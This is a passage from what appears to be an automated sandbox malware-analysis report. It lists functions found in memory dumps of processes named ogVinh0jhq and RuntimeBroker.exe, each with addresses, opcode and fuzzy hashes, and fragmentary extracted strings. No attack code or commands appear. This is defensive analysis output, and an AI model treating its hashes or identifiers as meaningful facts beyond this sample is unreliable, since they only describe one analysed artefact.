Instruction ID: 592309077bdebfa0ac19d994ec8965be2b0f9eee987fccda1d3938d1e75ca3b7
Opcode Fuzzy Hash: c246d5abe20f1106f2dcc5d49d35fb2315098259ed3646082d32c9003e0e5e46
Instruction Fuzzy Hash: 7121503094E78A9FD7539BB488A85A97FF0FF5B314B0604E6D048CB0B2DA289646D711

Function 00007FFD9B873213 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc2f7c15b03ef3b3c4b104f693578e4faca22a3d4c60799af9987141a719e53e
Instruction ID: 7230b1bcea4214cc4a7791aceeb7cb7e02aa83020a889f89c0e66144992d9143
Opcode Fuzzy Hash: cc2f7c15b03ef3b3c4b104f693578e4faca22a3d4c60799af9987141a719e53e
Instruction Fuzzy Hash: BE210771E1951E8FDBA4EF94C4A4AECB7B1FF58301F154129D009E72A1DA386A41DB01

Function 00007FFD9B870A01 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cfdd0e063faca2f1bbc8d4a07a0764fe11d18d779f823400c8918de5ac24410
Instruction ID: 820c5b5f541ed58c0f4a876cce2c63652dce0d37f8f41de41a8a9953917f1eb1
Opcode Fuzzy Hash: 8cfdd0e063faca2f1bbc8d4a07a0764fe11d18d779f823400c8918de5ac24410
Instruction Fuzzy Hash: 6111B230E1A50E8FEB90EBA8C8A95FDB7E0FF58744F4145B6D418C70A6EE34A6409700

Function 00007FFD9B87C5F3 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 322ce2f3c6e4870755f66dc2084c885fb25dbd746799d6d272b09f4bd7ef5046
Instruction ID: a268ad3763b21693bda87bc4cf2088ad0a149531959f9ba39aec22f19b6727bb
Opcode Fuzzy Hash: 322ce2f3c6e4870755f66dc2084c885fb25dbd746799d6d272b09f4bd7ef5046
Instruction Fuzzy Hash: 6F11BF31A0991E8BEB55FFA894596F977E0FF58315F00097AD42DC60A6DE34A2848740

Function 00007FFD9B8734C1 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7e3f227b3370e40d53e2ced8dce23b19e174634b406d0597bbbe11f78530d31
Instruction ID: 0d9e3ae9734f1268bd126f0a36703e4b4be14e7484e8e9d7edf802073c491c13
Opcode Fuzzy Hash: d7e3f227b3370e40d53e2ced8dce23b19e174634b406d0597bbbe11f78530d31
Instruction Fuzzy Hash: F3118E70A0A64E8FDB59EF64C8A96BD7BE0FF19304F0104BED429C31A2DA35A640C701

Function 00007FFD9B87C240 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc64baf9350df45d05bb2ba65d36be9b7e98ef6bd104e72e4a10cea882f40db0
Instruction ID: e5e364fd9b3d17ae29720af73104a212dd20d9fc3c9344c28dc36071cf4657ce
Opcode Fuzzy Hash: fc64baf9350df45d05bb2ba65d36be9b7e98ef6bd104e72e4a10cea882f40db0
Instruction Fuzzy Hash: C011823091964E4FDB56EBB888AD5B97BF0FF1A304F1605BBD419C70A2DE356644CB40

Function 00007FFD9B8711AD Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aff257e4ac693342c2518e37b00ba91e000c673cf5bcf8536356981a8e5ecb9a
Instruction ID: 4a7c64847279c68aefaa364a3885771790ce4b775bb5ec1230dedfb779d09caa
Opcode Fuzzy Hash: aff257e4ac693342c2518e37b00ba91e000c673cf5bcf8536356981a8e5ecb9a
Instruction Fuzzy Hash: 9F11E630E2A64E4FEB64EBA4C4B96B97BE0EF19304F0104BEC01DC74E1DA255640D700

Function 00007FFD9B8721E5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced66ac833ffa040c08c51c1512e2628ebbfa7817ed24326f85155c45b78c777
Instruction ID: 649f92e40f01f6fd1babb62179a076e9126a75b5d53b8e01dbc4527073cb035f
Opcode Fuzzy Hash: ced66ac833ffa040c08c51c1512e2628ebbfa7817ed24326f85155c45b78c777
Instruction Fuzzy Hash: EE019230A6B64E9FE761EFB488A95A87BE0EF0A304F4215B6D408C70B6DE35E580D701

Function 00007FFD9B872E51 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ca8df17eec2185af03329cc5c304bc1d641e0e69e76d1278c2be8cdc242c8dc
Instruction ID: 2a2c3fb347b04740f3c800104e849fab4a321cebc56e86d41a7af02b1fa6abb8
Opcode Fuzzy Hash: 2ca8df17eec2185af03329cc5c304bc1d641e0e69e76d1278c2be8cdc242c8dc
Instruction Fuzzy Hash: A7018431E1F64E8FE761EFA488A99A97BE0FF1A304F0255B6D408C71A7EA34E5449701

Function 00007FFD9B87CF1D Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f08722b4736fdbe79da6ce53f2784873b370e9c2f4d64c6c3c193667bfa861a
Instruction ID: 7fc0d8b2cd0f6febf247a91891d4f512e8672875b19019a5464070d0a8166f2f
Opcode Fuzzy Hash: 2f08722b4736fdbe79da6ce53f2784873b370e9c2f4d64c6c3c193667bfa861a
Instruction Fuzzy Hash: D8118E30A0964E8FDB59EF64C4A86B97BE0FF19308F4204BAD41DC31A2DB749650CB40

Function 00007FFD9B8705D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d80a23875d1f8dea746db1b88595684187e1c9e2975ab1b374950dbaf88d749f
Instruction ID: 87249e38fa8a148817fd140379f4cdbc887dd7b472b4605dd9ee16a499380592
Opcode Fuzzy Hash: d80a23875d1f8dea746db1b88595684187e1c9e2975ab1b374950dbaf88d749f
Instruction Fuzzy Hash: 79019230A0A50E8FEB58EFA4C0E96B977E1FF99308F51007ED40EC35A4CA35A650D740

Function 00007FFD9B87282D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4afbd78c87094b2d085af68e8b19c3e53e83c00c5c44530b125d6a64bab15a91
Instruction ID: c64f7374fa4d2c3137aba7c485fe5a5b7a814d914b482293801a141b00d8cd94
Opcode Fuzzy Hash: 4afbd78c87094b2d085af68e8b19c3e53e83c00c5c44530b125d6a64bab15a91
Instruction Fuzzy Hash: EC018430E1B54E8FE761AFA484A85A97BE0FF1E304F0645F6D418C70A6DE39E1409740

Function 00007FFD9B87A6A8 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce25348eeabf03b6a311c78de2367be362c4f24f6df61cf316bca3bca9a88904
Instruction ID: 780b440eafe152e32f524f6fde10d39af31bb065f68072e3c364ae1a0f9ba20a
Opcode Fuzzy Hash: ce25348eeabf03b6a311c78de2367be362c4f24f6df61cf316bca3bca9a88904
Instruction Fuzzy Hash: BB011E30E1590E9FEB94EBA4C4686BE76E0FF18305F51047AD42ED21A5DE35A650CB40

Function 00007FFD9B87B56C Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbd2c82d2d6e37cc63e4d712985cf99da3865b465b137e4237af96f0bef66292
Instruction ID: d437cb384756d3209adac4df50d705517776e83d3c9360298c15e90f12ced9ba
Opcode Fuzzy Hash: dbd2c82d2d6e37cc63e4d712985cf99da3865b465b137e4237af96f0bef66292
Instruction Fuzzy Hash: 9F014C70A0954E8EEB94EF68C4A96BE7BE1FF1C309F51047ED41DC31A1DA35A6508700

Function 00007FFD9B872EC9 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daefc896c9c0ae6aca1bb2b7f7077631cfe58d4d498ed7f51c5749330985dc09
Instruction ID: b26c308e7343c79fb8b806471d117468144584c191117b56eb78043def684e93
Opcode Fuzzy Hash: daefc896c9c0ae6aca1bb2b7f7077631cfe58d4d498ed7f51c5749330985dc09
Instruction Fuzzy Hash: C1018430A1A64E4FE762EBB488A95A97BE0EF4A304F4605F7D408C70B6DA38A544D741

Function 00007FFD9B87A409 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69f02c9403c869adc0bb85fe6265aa0f753903816a28421d150e2ec7e581d913
Instruction ID: 3b14fc16e4e2b67ca273d87b0115c369315ced7ec2fbddfdca62fb344df1a4b9
Opcode Fuzzy Hash: 69f02c9403c869adc0bb85fe6265aa0f753903816a28421d150e2ec7e581d913
Instruction Fuzzy Hash: B901D430A0E68D5FE762EB74C8AD1A93BE0EF5A304F1604F7D40CC70B2DA38A5449301

Function 00007FFD9B870610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d07dd254356c86749e0e903c85cf65c7b9e3472e0bfdf119d8fa6a0b0708a646
Instruction ID: b5f0cd68aa269232dd0f6f3d6afceb9e925eed93365f78041636ed52eaecd67e
Opcode Fuzzy Hash: d07dd254356c86749e0e903c85cf65c7b9e3472e0bfdf119d8fa6a0b0708a646
Instruction Fuzzy Hash: FD01A230A1A50E8ADB58EFA4C4A85B973A0FF09309F10047ED41EC31E5DE35A240DA00

Function 00007FFD9B870608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec793735535d0f50dbab94f39a8e87e6549c76c8b9280499032ee004ce5f27bf
Instruction ID: 67ba276b7765cef72cf64654a62f11635525a64c2def5cbc33d4454075f23e56
Opcode Fuzzy Hash: ec793735535d0f50dbab94f39a8e87e6549c76c8b9280499032ee004ce5f27bf
Instruction Fuzzy Hash: F6018130A1650ECBEB69EFA4C5A96B973A0FF1E309F51087ED41EC31E5DE35A250DA00

Function 00007FFD9B871C2D Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 23d46df6885d1df72202694e4b2191b73f57d3b78e00468208e71dae048af1dd
Instruction ID: ffae1650144b8ae6c0551115e21c8684a6a285243cc189f8a2bb3ce0ec847e7f
Opcode Fuzzy Hash: 23d46df6885d1df72202694e4b2191b73f57d3b78e00468208e71dae048af1dd
Instruction Fuzzy Hash: C401D630A0A64E8FDB54EF94C4E91B93BA1FF59304F4100BAD80CC35A1CB359650D741

Function 00007FFD9B8705D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3a8691251d3037de9b9c3019881006f8fc5773e6302db7bbe5aa24428cd991d
Instruction ID: e317af9b53bfb4f5f8fd3d018b08dab54bb7c1cea1176cb0627b149827b63fa4
Opcode Fuzzy Hash: e3a8691251d3037de9b9c3019881006f8fc5773e6302db7bbe5aa24428cd991d
Instruction Fuzzy Hash: 07F0C230A0A50E8FEB58EFA494E96FA37A0FF49308F41007AE80DC34A1CA35A650D740

Function 00007FFD9B8711C0 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1103bc278239301f516f7b09a2a3ec47db9450f197151677f64be8a59bb1118
Instruction ID: 925e2232b44f46cfebf83e4a1a80d7aa961e04c6bba03644c633e17ef54f37bb
Opcode Fuzzy Hash: a1103bc278239301f516f7b09a2a3ec47db9450f197151677f64be8a59bb1118
Instruction Fuzzy Hash: 00F0C830E2A64F8AEB64EBE488B92F977E4FF59309F01143ED42DC74E1EE2416549641

Function 00007FFD9B87B244 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c37ec44111b95ec1cb609c6418e917f63d6a67be25c7b3392bb930110f9732cd
Instruction ID: 6963a7e7143328cd23d7d8f19932211670e2f66ad214a707b98b7d29f4e03883
Opcode Fuzzy Hash: c37ec44111b95ec1cb609c6418e917f63d6a67be25c7b3392bb930110f9732cd
Instruction Fuzzy Hash: 79F08130E1A91D8EDBA4EB1484A5BE9B3B6FF5C300F1081A6D00CD3165CE34AB81AB40

Function 00007FFD9B872749 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d58162ee4a13f744f559e970bb8627834e6120640e0a184dc81a563b0c238fbd
Instruction ID: 10a79650dc5ec158c9a36ce97a8664d7ee7e5a4d5bd52b897314e4fbe57ce861
Opcode Fuzzy Hash: d58162ee4a13f744f559e970bb8627834e6120640e0a184dc81a563b0c238fbd
Instruction Fuzzy Hash: 88F0F63090F38E8FDB2A9F6488A82F93BB0FF06204F4604FAD409C60E2DB389514CB01

Function 00007FFD9B8727BD Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0adaec22e2d66442e80d51611f65c5d7f4e21739ef053d3aee035478c360d41e
Instruction ID: 1164a4409f6fadb84e24214ff3461b3ba0196f7a8c52659e02bb692fad2aed83
Opcode Fuzzy Hash: 0adaec22e2d66442e80d51611f65c5d7f4e21739ef053d3aee035478c360d41e
Instruction Fuzzy Hash: 04F0BB3091F68D8FDB699F6488651F93BA0FF0A308F4504BED409C71E6DB399554D701

Function 00007FFD9B872344 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efb39d8d73b7a4ee641e99d8b1135dcb105f8b5051ff7251977619a170b99f9a
Instruction ID: 878949c145b0f7cf77c8444d8fff29e1f6225a8cc6e8c4a42fb3a6e31975817d
Opcode Fuzzy Hash: efb39d8d73b7a4ee641e99d8b1135dcb105f8b5051ff7251977619a170b99f9a
Instruction Fuzzy Hash: B9F08930A0E20D9FDB60EF40C8A47A877B1EB55304F2545FAC04DD72A1CE786A849B40

Non-executed Functions

Function 00007FFD9B87EB24 Relevance: 8.9, Strings: 7, Instructions: 117COMMON

Download Yara Rule

Strings

u, xrefs: 00007FFD9B87FB01
%, xrefs: 00007FFD9B87FC19
V, xrefs: 00007FFD9B87FB0E
{, xrefs: 00007FFD9B87DF15
C, xrefs: 00007FFD9B87EF48
h, xrefs: 00007FFD9B87FB3C
}, xrefs: 00007FFD9B87EFB0

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: %$C$V$h$u${$}
API String ID: 0-1921298197
Opcode ID: 697a69dfe20ba82918a245030de2deff618527a3d4f3c3cf18381f3a55a90141
Instruction ID: 6953bfd0204ede919f5fe852b23e857d33c1002aaa3c6d4b3ab1ea5a69a083c9
Opcode Fuzzy Hash: 697a69dfe20ba82918a245030de2deff618527a3d4f3c3cf18381f3a55a90141
Instruction Fuzzy Hash: 5951D7B0E0926E8BDB74DF54C8A47F9B6B1EB58305F0145FAD04DA76A1CB785A80EF40

Function 00007FFD9B87E167 Relevance: 5.1, Strings: 4, Instructions: 127COMMON

Download Yara Rule

Strings

:, xrefs: 00007FFD9B87E1F5
R, xrefs: 00007FFD9B87E171
g, xrefs: 00007FFD9B87E2CC
I, xrefs: 00007FFD9B87E268

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: :$I$R$g
API String ID: 0-989302672
Opcode ID: 1ad635a9de4dcfed7b53ee5068e2d730eeb1c3cd0944ff509ed608392186380c
Instruction ID: 86fa895a0a957bd9239decdcd72cc37cb9f9b855bacf1bc684118ca4af06ad3f
Opcode Fuzzy Hash: 1ad635a9de4dcfed7b53ee5068e2d730eeb1c3cd0944ff509ed608392186380c
Instruction Fuzzy Hash: A551AB70A0966D8FDBA9DF18C890BE9B7B5EB58305F0041EAD44DA3291CB74ABC1CF40

Function 00007FFD9B87DFAE Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

", xrefs: 00007FFD9B87E029
K, xrefs: 00007FFD9B87DFF3
1, xrefs: 00007FFD9B87ED34
$, xrefs: 00007FFD9B87DFB8

Memory Dump Source

Source File: 00000018.00000002.1919380540.00007FFD9B870000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd9b870000_ogVinh0jhq.jbxd

Similarity

API ID:
String ID: "$$$1$K
API String ID: 0-1999501151
Opcode ID: 99588b46ac887d7d277d0145a58af395bd3b4d436f0cd6894c2449a33f741d10
Instruction ID: 40c92df6331c0830fce63b876f571d62c0e166b163899aed74c6f1b5718e46aa
Opcode Fuzzy Hash: 99588b46ac887d7d277d0145a58af395bd3b4d436f0cd6894c2449a33f741d10
Instruction Fuzzy Hash: 1D3119B1E0A22E8FEB78DF44C8947E9B7B1EB48315F0041AAD40DA7690CB385A80DF41

Analysis Process: RuntimeBroker.exePID: 7456, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9B8B3545 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

V_H, xrefs: 00007FFD9B8B35CD

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: V_H
API String ID: 0-105569101
Opcode ID: 71419d682a832e9ec664aeec90d0a0c0bccdb6691c330a97946a42e0515b9b2d
Instruction ID: 6ec6aa8e6e3ecaa3df86268f2cc7a6ae837b7a729a72b53ade2ab8b0f6c46548
Opcode Fuzzy Hash: 71419d682a832e9ec664aeec90d0a0c0bccdb6691c330a97946a42e0515b9b2d
Instruction Fuzzy Hash: 68A1BF71E1995E8FEB98DB68C8657ADBBE1FF5A340F40027AD019D32DADB7428018B41

Function 00007FFD9B8C3555 Relevance: 4.1, Strings: 3, Instructions: 315COMMON

Download Yara Rule

Strings

Nr, xrefs: 00007FFD9B8C394D
4r, xrefs: 00007FFD9B8C368E
Nr, xrefs: 00007FFD9B8C377A

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8c1000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: 4r$Nr$Nr
API String ID: 0-3193503180
Opcode ID: fe928f96a7c656cd99ab61442fa7c2cfd71b7d738441d8759a08be02bb6ad094
Instruction ID: b4ba750cd5f0bb93e647b84b38b6b2709a337602bc037e772d274686554a4800
Opcode Fuzzy Hash: fe928f96a7c656cd99ab61442fa7c2cfd71b7d738441d8759a08be02bb6ad094
Instruction Fuzzy Hash: 9DC1A8B0E1991D8FDBA4EB98C865BFDB7B1FF59300F5141AAD00DE3291DA346A858F40

Function 00007FFD9B8BDF01 Relevance: 2.5, Strings: 2, Instructions: 48COMMON

Download Yara Rule

Strings

`, xrefs: 00007FFD9B8BE353
{, xrefs: 00007FFD9B8BDF15

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8BA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8BA000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8ba000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: `${
API String ID: 0-2175359776
Opcode ID: 48016276d38f7d853b3def24705c37091ca6c2cc10a3f12e4b6fa209f2985bf5
Instruction ID: cb1825f92d820a42e896bab5027cafcafbc7e88acce2cf6bf23bb913783ae8fd
Opcode Fuzzy Hash: 48016276d38f7d853b3def24705c37091ca6c2cc10a3f12e4b6fa209f2985bf5
Instruction Fuzzy Hash: E221E770E0926E8FEB78DF54C8A87A9B6B1BF58301F0045F9D40DA6691CB785A84CF81

Function 00007FFD9B8B051D Relevance: 1.6, Strings: 1, Instructions: 384COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8B0839

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 624ef8dc3e00ad0fca8c4b89704d40cb9f7361ab912f932f8d6c0f51043cae58
Instruction ID: 51575645f636bb06fce0e0f61d85189ffdb3dda75c0c13534b76b327dd6d2b63
Opcode Fuzzy Hash: 624ef8dc3e00ad0fca8c4b89704d40cb9f7361ab912f932f8d6c0f51043cae58
Instruction Fuzzy Hash: E4B13B43B1F6E64AE32673BD7C3A4F93F50DF46664B0902F7D0988A0E7EC09650686C6

Function 00007FFD9B8B05A0 Relevance: 1.6, Strings: 1, Instructions: 313COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8B0839

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 0c647f62f6dd9c5644603aed07ab22bf7991eed883cd9b618b172329ad6979b0
Instruction ID: 6b583880011f7d5fdff6ce1d8605d52dc0fc624717528637cc259c0024b194f7
Opcode Fuzzy Hash: 0c647f62f6dd9c5644603aed07ab22bf7991eed883cd9b618b172329ad6979b0
Instruction Fuzzy Hash: AD913743B1F6E64AE36663BD7C391E93F50DF46664B0902FBE0988A0E7EC05650686C6

Function 00007FFD9B8B05ED Relevance: 1.6, Strings: 1, Instructions: 301COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9B8B0839

Memory Dump Source

Source File: 00000019.00000002.1923999515.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_7ffd9b8b0000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: eec6017ab0d35b5786ad56921ba84b7bf0bfa38f3c42507cd828c320992025dc
Instruction ID: 4d18941e700313818d6ed3b9f8bfb314fa10c703c163a643ecc4a313c027cc21
Opcode Fuzzy Hash: eec6017ab0d35b5786ad56921ba84b7bf0bfa38f3c42507cd828c320992025dc
Instruction Fuzzy Hash: 55916B43B1F6E60AE36523BD6C390E97F50DF42664B0942FBE0A84A0E7EC09650687C6

Function 00007FFD9B8B0638 Relevance: 1.5, Strings: 1, Instructions: 286COMMON

Download Yara Rule

Strings

